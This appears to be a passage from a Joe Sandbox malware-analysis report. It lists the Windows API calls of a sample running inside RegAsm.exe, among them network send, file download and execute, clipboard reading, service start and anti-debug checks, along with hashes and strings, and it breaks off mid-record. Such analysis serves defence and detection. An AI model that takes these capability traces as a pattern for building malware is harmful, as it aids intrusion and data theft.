                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                • String ID: SeShutdownPrivilege
                                                                • API String ID: 3534403312-3733053543
                                                                • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00409293
                                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,013E6988,00000010), ref: 004048E0
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                • String ID:
                                                                • API String ID: 1824512719-0
                                                                • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                • String ID:
                                                                • API String ID: 276877138-0
                                                                • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: ACP$OCP
                                                                • API String ID: 2299586839-711371036
                                                                • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                APIs
                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                                • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Resource$FindLoadLockSizeof
                                                                • String ID: SETTINGS
                                                                • API String ID: 3473537107-594951305
                                                                • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 004096A5
                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                • String ID:
                                                                • API String ID: 1157919129-0
                                                                • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0040884C
                                                                • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                • String ID:
                                                                • API String ID: 1771804793-0
                                                                • Opcode ID: 99a3056b48020488f4a7cc8d14455ae8aa2eebd7be9758c69deaf4fbc99c6cac
                                                                • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                • Opcode Fuzzy Hash: 99a3056b48020488f4a7cc8d14455ae8aa2eebd7be9758c69deaf4fbc99c6cac
                                                                • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: DownloadExecuteFileShell
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                • API String ID: 2825088817-3056885514
                                                                • Opcode ID: 37cd12fcc7ef71c22cc9d869740aa10db7399bf8fc5aa589d703b0ccccefadff
                                                                • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                • Opcode Fuzzy Hash: 37cd12fcc7ef71c22cc9d869740aa10db7399bf8fc5aa589d703b0ccccefadff
                                                                • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileFind$FirstNextsend
                                                                • String ID: XPG$XPG
                                                                • API String ID: 4113138495-1962359302
                                                                • Opcode ID: fd6193630a935a9c0783525d90d8abb728b5b23f535aeb2500ec47bbe22b8f4c
                                                                • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                • Opcode Fuzzy Hash: fd6193630a935a9c0783525d90d8abb728b5b23f535aeb2500ec47bbe22b8f4c
                                                                • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137E1
                                                                  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137EC
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                • API String ID: 4127273184-3576401099
                                                                • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                                • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                • String ID:
                                                                • API String ID: 4212172061-0
                                                                • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID: p'E$JD
                                                                • API String ID: 1084509184-908320845
                                                                • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                • String ID:
                                                                • API String ID: 2829624132-0
                                                                • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                • ExitProcess.KERNEL32 ref: 0044338F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                APIs
                                                                • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                                • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                                • CloseClipboard.USER32 ref: 0040B760
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$CloseDataOpen
                                                                • String ID:
                                                                • API String ID: 2058664381-0
                                                                • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                APIs
                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                • CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseHandleOpenResume
                                                                • String ID:
                                                                • API String ID: 3614150671-0
                                                                • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
